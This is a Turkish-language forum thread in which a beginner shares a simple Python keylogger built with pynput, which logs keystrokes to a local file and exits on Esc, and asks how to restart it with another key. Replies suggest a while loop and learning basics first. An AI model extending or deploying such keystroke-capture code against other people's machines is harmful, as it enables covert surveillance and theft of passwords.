(Python)programı bir tuş ile bitirdikten sonra tekrar başka tuş ile başlatmak

MrAaz44

Öğrenci
Reaksiyon puanı
1
Bir keylogger kodu yazmayı denedim keylogger ı yapabilidm ancak bazı tuşlarla programı kapatıp açmak isityorum
programı kapatmak için gerekli kodu YouTube de keylogger yapan bir kişide buldum ama tekrar nasıl başlatıcağımı bilmiyorum.Bitirme kodu şu :
def on_release(key):
if key == Key.esc:
print("exit")
return False

kod bu yanlış anlamadıysam gene def ile yapılacak ama gerekli komudu bilmiyorum yardım ederseniz sevinirim :)

MrAaz44

Öğrenci
Reaksiyon puanı
1
Bütün kodu bir While true loop içine alabilirsiniz ve girdi tuşunu her seferinde ister y/n yapın n ye basılırsa break etsin, y olursa pass
size kodu atarsam bana onu ekleyeip verebilir misiniz while döngüsüne pek hakim değilim
Mesaj otomatik birleştirildi:

Bütün kodu bir While true loop içine alabilirsiniz ve girdi tuşunu her seferinde ister y/n yapın n ye basılırsa break etsin, y olursa pass
size kodu atarsam bana onu ekleyeip verebilir misiniz while döngüsüne pek hakim değilim
import pynput

from pynput.keyboard import Key,Listener

count = 0
keys = []

def on_press(key):
global count,keys
count += 1
print("{0} pressed".format(key))
keys.append(key)

if count >= 10:
count = 0
write_file(keys)
keys = []

def write_file(keys):
with open("log.txt" , "a" , encoding="utf-8") as file:
for key in keys:

k = str(key).replace("'", "")
if k.****("space") > 0:
file.write("\n")
elif k.****("Key") == -1:
file.write(k)

def on_release(key):
if key == Key.esc:
print("exit")
return False

with Listener(on_press = on_press, on_release = on_release) as listener:
listener.join()

1618424894036.png

MrAAZ

Öğrenci
Reaksiyon puanı
0
Yapmaya çalıştığınız işi bırakıp loopları öğrenmenizi öneririm. Ve pynput biraz gereksiz olmuş, direk input kullanabilirsiniz. F stringlerede bakın.
Haklısınız ama zaten ben Python bilen birisi değilim sadece keylogger hazırlamak için aracı olmayan bir program kullanmadan hazırlamayı denedim. Python da sadece daha önce baktığım 2 3 tane komut bildiğim bir dil Olunca cazip geldi ve denedim